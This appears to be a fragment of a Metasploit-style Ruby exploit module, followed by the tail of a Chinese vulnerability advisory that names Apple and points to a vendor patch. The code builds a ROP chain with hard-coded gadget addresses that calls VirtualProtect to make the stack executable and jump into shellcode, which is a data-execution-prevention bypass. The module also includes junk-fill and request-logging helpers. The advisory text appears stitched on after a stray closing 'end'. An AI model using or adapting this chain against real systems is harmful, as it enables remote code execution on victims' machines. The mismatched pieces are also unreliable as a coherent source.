# Build the VirtualProtect ROP chain (gadget addresses located with mona.py).
#
# The chain is emitted as little-endian DWORDs ("V*") and works in three steps:
#   1. POPAD / RET loads EDI, ESI, EBP, (ESP slot skipped), EBX, EDX, ECX, EAX
#      from the following eight DWORDs.
#   2. Two ADD gadgets turn EBX into 0x3e8 and EDX into 0x40 (presumably because
#      those small values could not be written directly - they contain null bytes).
#   3. PUSHAD / RET pushes the registers as a frame and returns into EDI (a RET),
#      which in turn returns into ESI (VirtualProtect). EBP (JMP ESP) becomes
#      VirtualProtect's return address and the ESP/EBX/EDX/ECX slots its four
#      arguments: lpAddress = the stack itself, dwSize = 0x3e8,
#      flNewProtect = 0x40 (PAGE_EXECUTE_READWRITE), lpflOldProtect = 0x673650b0.
#      After VirtualProtect pops its arguments, JMP ESP lands on the EAX slot
#      (four NOPs) and execution runs on into whatever follows this chain.
#
# NOTE(review): every address is absolute and valid only for the exact module
# builds the gadgets were extracted from (kernel32.dll is the only module the
# comments name). Under ASLR, or against any other build, the chain crashes
# the target instead of running. 0x673650b0 must also be a writable address,
# since VirtualProtect writes the old protection there and faults otherwise.
#
# @return [String] the packed ROP chain
def gimme_rop()
  # Step 1: POPAD gadget followed by the eight register slots it consumes.
  register_frame = [
    0x66c9a6c0, # POPAD / RET
    0x66801044, # EDI: RET
    0x7c801ad4, # ESI: VirtualProtect [kernel32.dll]
    0x6697aa03, # EBP: JMP ESP
    junk,       # ESP slot, discarded by POPAD
    0x6c1703e8, # EBX: dwSize, becomes 0x3e8 after adding 0x93e90000
    0xffffffd6, # EDX: flNewProtect, becomes 0x40 after adding 0x6a
    0x673650b0, # ECX: lpflOldProtect
    0x90909090, # EAX: NOPs reached by JMP ESP
  ]
  # Step 2: repair the two argument registers.
  fixups = [
    0x66b7de1b, # ADD EBX, 0x93E90000 / RET
    0x66975c56, # ADD EDX, 0x6A / RET
  ]
  # Step 3: lay the registers out as VirtualProtect's call frame and return into it.
  trigger = [
    0x6684b5c6, # PUSHAD / RET
  ]
  (register_frame + fixups + trigger).pack("V*")
end
# Four random alphabetic bytes read back as one native-endian unsigned 32-bit
# word. Used to fill the ESP slot that POPAD discards, so the value itself
# never matters.
#
# @return [Integer] an unsigned 32-bit value
def junk
  raw = rand_text_alpha(4)
  raw.unpack("L").first.to_i
end
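# Log an incoming HTTP request together with the action taken for it.
#
# @param req [#uri] the request; only its URI is logged
# @param cli [#peerhost, #peerport] the connected client
# @param action [String] what the handler decided to do with the request
# @return [void]
def status(req,cli,action)
  # req.uri is chosen by whoever connected to the exploit's HTTP server, so
  # strip non-printable characters (ANSI escapes, CR/LF) before echoing it to
  # the operator's console. Printable URIs are logged unchanged. Whether the
  # framework's console already filters these is not visible here, so the
  # check is kept local.
  uri = req.uri.to_s.gsub(/[^[:print:]]/, '?')
  print_status("Request for #{uri} from #{cli.peerhost}:#{cli.peerport}. #{action}")
end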
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：